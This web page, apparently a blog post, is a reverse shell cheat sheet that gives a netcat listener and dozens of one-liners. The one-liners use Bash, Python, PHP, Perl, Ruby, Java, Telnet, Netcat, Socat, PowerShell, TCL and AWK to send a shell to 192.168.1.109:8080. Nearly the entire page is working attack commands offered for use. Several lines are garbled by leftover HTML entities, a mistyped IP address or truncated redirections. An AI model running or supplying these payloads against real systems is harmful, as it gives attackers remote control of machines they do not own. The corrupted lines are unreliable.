Reverse Shell Cheat Sheet

Listener:

nc -l -v -p 8080

Bash

exec 5<>/dev/tcp/192.168.1.109/8080;cat <&5 | while read line; do $line 2>&5 >&5; done

 

exec /bin/sh 0</dev/tcp/192.168.1.109/8080 1>&0 2>&0

 

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

 

bash -i >& /dev/tcp/192.168.1.109/8080 0>&1

 

bash -i &gt;&amp; /dev/tcp/192.168.1.109//8080 0&gt;&amp;1

 

TCLsh

echo ‘set s [socket 192.168.1.109 8080];while 42 { puts -nonewline $s “shell>”;flush $s;gets $s c;set e “exec $c”;if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;’ | tclsh

 

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.109”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP

php -r ‘$sock=fsockopen(“192.168.1.109”,8080);exec(“/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’

 

php -r ‘$sock=fsockopen(“192.168.1.109”,8080);exec(“/bin/sh -i <&3 >&3 2>&3”);’

 

php -r ‘$s=fsockopen(“192.168.1.109”,8080);shell_exec(“/bin/sh -i <&3 >&3 2>&3”);’

php -r ‘$s=fsockopen(“192.168.1.109”,8080);`/bin/sh -i <&3 >&3 2>&3`;’

php -r ‘$s=fsockopen(“192.168.1.109”,8080);system(“/bin/sh -i <&3 >&3 2>&3”);’

php -r ‘$s=fsockopen(“192.168.1.109”,8080);popen(“/bin/sh -i <&3 >&3 2>&3”, “r”);’

 

Perl

perl -e ‘use Socket;$i=”192.168.1.109″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

perl -e ‘use Socket;$i=”192.168.1.109″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”&gt;&amp;S”);open(STDOUT,”&gt;&amp;S”);open(STDERR,”&gt;&amp;S”);exec(“/bin/sh -i”);};’

 

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.1.109:8080″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

 

Ruby

 

ruby -rsocket -e’f=TCPSocket.open(“192.168.1.109”,8080).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

ruby -rsocket -e’f=TCPSocket.open(“192.168.1.109”,8080).to_i;exec sprintf(“/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d”,f,f,f)’

 

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“192.168.1.109″,”8080″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

 

Java

r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.1.109/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()

 

Telnel:

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.109 8080 0/tmp/p

 

rm -f x; mknod x p && telnet 192.168.1.109 8080> 0<x | /bin/bash 1>x

 

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 192.168.1.109 8080 > f

 

telnet 192.168.1.109 8080 | /bin/bash | telnet 192.168.1.109

 

Netcat

 

nc -e /bin/sh 192.168.1.109 8080

 

/bin/sh | nc 192.168.1.109 8080

 

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.109 8080 0/tmp/p

 

Socat

socat tcp-connect:192.138.1.109:8080 exec:”bash -li”,pty,stderr,setsid,sigint,sane

 

Powershell

powershell.exe -w hidden -c ‘$client = New-Object System.Net.Sockets.TCPClient(“192.168.1.109”,8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()’

 

AWK

 

awk ‘BEGIN {s = “/inet/tcp/0/192.168.1.109/8080”; while(42) { do{ printf “shell>” |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != “exit”) close(s); }}’ /dev/null

 

One thought on “Reverse Shell Cheat Sheet

  1. Pingback: Reverse Shell Cheat Sheet | PlanetaLibre

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*